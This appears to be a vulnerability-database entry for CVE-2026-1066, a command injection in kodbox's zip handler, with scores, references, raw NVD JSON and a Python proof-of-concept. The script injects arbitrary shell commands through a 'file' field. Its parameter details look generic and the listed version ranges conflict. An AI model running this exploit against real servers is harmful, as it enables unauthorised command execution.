CVE-2026-1066

Description

A vulnerability was detected in kalcaddle kodbox up to 1.61.10. This issue affects some unknown processing of the file /?explorer/index/zip of the component Compression Handler. The manipulation results in command injection. The attack may be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:kodcloud:kodbox:*:*:*:*:*:*:*:* - VULNERABLE

kalcaddle kodbox < 1.61.10

kalcaddle kodbox 1.x 所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-1066 PoC - kalcaddle kodbox Command Injection
# Target: kalcaddle kodbox <= 1.61.10
# Component: Compression Handler (/explorer/index/zip)

def exploit(target_url, username, password, command):
    """
    Exploit for CVE-2026-1066
    This PoC demonstrates command injection in kodbox zip handler
    """
    # Login to kodbox
    login_url = target_url + '/?user/login'
    login_data = {
        'user': username,
        'password': password
    }
    
    session = requests.Session()
    resp = session.post(login_url, data=login_data)
    
    if resp.status_code != 200:
        print('[-] Login failed')
        return False
    
    # Exploit command injection via zip component
    # Inject command using filename parameter
    exploit_url = target_url + '/?explorer/index/zip'
    
    # Construct malicious payload
    # Example: filename containing command injection
    payload = {'file': f'test.zip;{command};#'}
    
    try:
        resp = session.post(exploit_url, data=payload, timeout=10)
        if resp.status_code == 200:
            print(f'[+] Command executed successfully: {command}')
            return True
    except Exception as e:
        print(f'[-] Error: {e}')
    
    return False

if __name__ == '__main__':
    if len(sys.argv) < 5:
        print(f'Usage: python {sys.argv[0]} <target_url> <username> <password> <command>')
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    cmd = sys.argv[4]
    
    exploit(target, user, pwd, cmd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1066
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1066
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1066/
[4] VulDB https://vuldb.com/cve/CVE-2026-1066
[5] https://github.com/DReazer/CV3/blob/main/Krce.md
[6] https://vuldb.com/?ctiid.341665
[7] https://vuldb.com/?id.341665
[8] https://vuldb.com/?submit.731436

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1066", "sourceIdentifier": "[email protected]", "published": "2026-01-17T21:15:49.960", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in kalcaddle kodbox up to 1.61.10. This issue affects some unknown processing of the file /?explorer/index/zip of the component Compression Handler. The manipulation results in command injection. The attack may be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad fue detectada en kalcaddle kodbox hasta la versión 1.61.10. Este problema afecta un procesamiento desconocido del archivo /?explorer/index/zip del componente Compression Handler. La manipulación resulta en inyección de comandos. El ataque puede ser lanzado remotamente. El exploit ahora es público y puede ser utilizado. El proveedor fue contactado con antelación sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kodcloud:kodbox:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.61.10", "matchCriteriaId": "2980DF42-81D1-46D8-86AE-1EE93BBD64FF"}]}]}], "references": [{"url": "https://github.com/DReazer/CV3/blob/main/Krce.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.341665", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341665", "source": "[email protected]", "tags": ["Third Party Advi ... (truncated)